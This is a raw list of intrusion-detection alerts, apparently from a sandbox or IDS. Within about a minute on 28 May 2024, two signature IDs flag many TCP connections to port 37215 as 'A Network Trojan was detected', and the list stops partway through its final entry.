          SID:2835222
          Source Port:54120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102730
          SID:2835222
          Source Port:48418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681226
          SID:2829579
          Source Port:42368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401489
          SID:2829579
          Source Port:34524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726936
          SID:2835222
          Source Port:50508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.484772
          SID:2829579
          Source Port:48700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709291
          SID:2835222
          Source Port:43528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.589062
          SID:2835222
          Source Port:45210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190470
          SID:2835222
          Source Port:46636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668070
          SID:2829579
          Source Port:53352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.355855
          SID:2835222
          Source Port:35572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804438
          SID:2829579
          Source Port:36868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.181871
          SID:2835222
          Source Port:51088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864451
          SID:2835222
          Source Port:59044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.180310
          SID:2835222
          Source Port:36106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.481093
          SID:2835222
          Source Port:49704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464123
          SID:2829579
          Source Port:46024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.591220
          SID:2835222
          Source Port:55054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268813
          SID:2829579
          Source Port:43640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272880
          SID:2835222
          Source Port:48460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324249
          SID:2835222
          Source Port:41694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462595
          SID:2835222
          Source Port:45342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780392
          SID:2835222
          Source Port:47944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.230924
          SID:2835222
          Source Port:39230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667685
          SID:2835222
          Source Port:44394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710287
          SID:2829579
          Source Port:53380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.225208
          SID:2829579
          Source Port:37948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656614
          SID:2829579
          Source Port:58140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770721
          SID:2829579
          Source Port:36606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.106014
          SID:2835222
          Source Port:48876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665200
          SID:2829579
          Source Port:37730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877927
          SID:2835222
          Source Port:42984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848378
          SID:2835222
          Source Port:50066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046922
          SID:2835222
          Source Port:45700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.613756
          SID:2835222
          Source Port:53264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.704828
          SID:2829579
          Source Port:44684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663263
          SID:2835222
          Source Port:38938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465283
          SID:2829579
          Source Port:46182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.276842
          SID:2835222
          Source Port:58468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.860034
          SID:2829579
          Source Port:56888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042066
          SID:2829579
          Source Port:54470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847680
          SID:2829579
          Source Port:55222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774308
          SID:2835222
          Source Port:49360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.150400
          SID:2829579
          Source Port:60848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291646
          SID:2835222
          Source Port:42406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403039
          SID:2835222
          Source Port:56746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657137
          SID:2835222
          Source Port:35616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.241864
          SID:2835222
          Source Port:59314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793559
          SID:2835222
          Source Port:38864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064788
          SID:2835222
          Source Port:44628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979054
          SID:2835222
          Source Port:37368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529162
          SID:2835222
          Source Port:44640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176038
          SID:2829579
          Source Port:51032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.112962
          SID:2835222
          Source Port:52304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.243312
          SID:2829579
          Source Port:60732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211480
          SID:2835222
          Source Port:34110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164488
          SID:2829579
          Source Port:40136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291749
          SID:2829579
          Source Port:39082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102997
          SID:2829579
          Source Port:50150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923802
          SID:2835222
          Source Port:43864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431503
          SID:2829579
          Source Port:39838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.075397
          SID:2829579
          Source Port:50130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190369
          SID:2835222
          Source Port:60412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845264
          SID:2829579
          Source Port:50664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297701
          SID:2829579
          Source Port:50274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.080798
          SID:2829579
          Source Port:47626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709130
          SID:2829579
          Source Port:51034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214864
          SID:2835222
          Source Port:35076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938160
          SID:2835222
          Source Port:46316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215977
          SID:2829579
          Source Port:37210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124592
          SID:2829579
          Source Port:58820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268854
          SID:2835222
          Source Port:52040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156293
          SID:2829579
          Source Port:57908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666176
          SID:2829579
          Source Port:40642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.870564
          SID:2829579
          Source Port:32966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213275
          SID:2835222
          Source Port:42584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.490261
          SID:2829579
          Source Port:39732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329974
          SID:2835222
          Source Port:49710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.974923
          SID:2835222
          Source Port:44726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401344
          SID:2835222
          Source Port:55142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215495
          SID:2835222
          Source Port:38502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176699
          SID:2835222
          Source Port:34180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466337
          SID:2829579
          Source Port:34958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.942271
          SID:2835222
          Source Port:54146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923518
          SID:2835222
          Source Port:50668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338504
          SID:2835222
          Source Port:33306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535584
          SID:2829579
          Source Port:47138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590967
          SID:2835222
          Source Port:58360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977689
          SID:2829579
          Source Port:44626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324659
          SID:2829579
          Source Port:34584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890754
          SID:2835222
          Source Port:47988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.512777
          SID:2829579
          Source Port:51102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.064918
          SID:2829579
          Source Port:57140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.514204
          SID:2835222
          Source Port:56896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.023024
          SID:2829579
          Source Port:59040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953526
          SID:2835222
          Source Port:48608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272781
          SID:2835222
          Source Port:51024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204556
          SID:2829579
          Source Port:42516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530230
          SID:2829579
          Source Port:32828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842926
          SID:2835222
          Source Port:57134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175786
          SID:2835222
          Source Port:49974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063215
          SID:2835222
          Source Port:40534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797246
          SID:2829579
          Source Port:40820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841458
          SID:2835222
          Source Port:54870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.223670
          SID:2829579
          Source Port:42958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206780
          SID:2835222
          Source Port:51636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.034501
          SID:2835222
          Source Port:54954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.228264
          SID:2835222
          Source Port:46292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.187355
          SID:2829579
          Source Port:53428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890997
          SID:2835222
          Source Port:58722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.886433
          SID:2829579
          Source Port:38582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210297
          SID:2829579
          Source Port:54200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.060666
          SID:2829579
          Source Port:38426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299390
          SID:2829579
          Source Port:44162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.622292
          SID:2829579
          Source Port:56674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.935152
          SID:2829579
          Source Port:50306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678146
          SID:2829579
          Source Port:55414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046584
          SID:2829579
          Source Port:58216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322022
          SID:2829579
          Source Port:42262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287671
          SID:2835222
          Source Port:34568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142819
          SID:2835222
          Source Port:53090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.697067
          SID:2835222
          Source Port:40586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090743
          SID:2829579
          Source Port:54166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992448
          SID:2835222
          Source Port:56756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605598
          SID:2829579
          Source Port:57488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.821791
          SID:2835222
          Source Port:57068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.614642
          SID:2835222
          Source Port:35220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141604
          SID:2835222
          Source Port:50630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230131
          SID:2835222
          Source Port:48486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537722
          SID:2829579
          Source Port:35930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338366
          SID:2829579
          Source Port:35270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656279
          SID:2835222
          Source Port:39048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806492
          SID:2835222
          Source Port:36320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849176
          SID:2835222
          Source Port:48386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976253
          SID:2835222
          Source Port:52764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.432497
          SID:2835222
          Source Port:53340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.178519
          SID:2829579
          Source Port:54050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221718
          SID:2835222
          Source Port:47770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.863312
          SID:2835222
          Source Port:52078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.867572
          SID:2835222
          Source Port:51336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959068
          SID:2835222
          Source Port:55966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547026
          SID:2829579
          Source Port:41612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068174
          SID:2829579
          Source Port:45822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.222861
          SID:2835222
          Source Port:34556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.889914
          SID:2835222
          Source Port:36516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064589
          SID:2829579
          Source Port:57446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147430
          SID:2829579
          Source Port:34724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221511
          SID:2835222
          Source Port:50878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.496994
          SID:2829579
          Source Port:52454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211883
          SID:2829579
          Source Port:51848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841578
          SID:2835222
          Source Port:33762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.622915
          SID:2835222
          Source Port:34156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666992
          SID:2835222
          Source Port:38476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684605
          SID:2835222
          Source Port:35446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782571
          SID:2829579
          Source Port:40664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332031
          SID:2835222
          Source Port:47852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336886
          SID:2835222
          Source Port:36102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.630520
          SID:2835222
          Source Port:40610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840398
          SID:2835222
          Source Port:54318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339693
          SID:2829579
          Source Port:53522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400936
          SID:2835222
          Source Port:44000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923488
          SID:2829579
          Source Port:49024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542435
          SID:2835222
          Source Port:47930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.858993
          SID:2835222
          Source Port:50906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.187260
          SID:2829579
          Source Port:51590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525767
          SID:2829579
          Source Port:54804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943529
          SID:2829579
          Source Port:45302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874770
          SID:2835222
          Source Port:44242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.422139
          SID:2829579
          Source Port:60132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666207
          SID:2829579
          Source Port:37652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.010535
          SID:2829579
          Source Port:60978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.703928
          SID:2829579
          Source Port:41268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669282
          SID:2829579
          Source Port:34442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177494
          SID:2835222
          Source Port:50394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.600620
          SID:2829579
          Source Port:47004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764729
          SID:2829579
          Source Port:53998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842466
          SID:2835222
          Source Port:56446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810728
          SID:2829579
          Source Port:58506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063255
          SID:2829579
          Source Port:55948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.814317
          SID:2835222
          Source Port:57468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741812
          SID:2835222
          Source Port:58466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271989
          SID:2829579
          Source Port:47058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724676
          SID:2829579
          Source Port:34436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.167722
          SID:2829579
          Source Port:53264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214021
          SID:2835222
          Source Port:55496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352538
          SID:2835222
          Source Port:43210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849199
          SID:2829579
          Source Port:56866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473624
          SID:2835222
          Source Port:48782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.165583
          SID:2829579
          Source Port:50404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874825
          SID:2835222
          Source Port:56322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666466
          SID:2829579
          Source Port:35402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743333
          SID:2835222
          Source Port:43100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.526772
          SID:2835222
          Source Port:57984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548613
          SID:2835222
          Source Port:51692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594619
          SID:2835222
          Source Port:60038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178520
          SID:2835222
          Source Port:47936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176463
          SID:2829579
          Source Port:60322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878779
          SID:2835222
          Source Port:52294
          Destination Port:37215
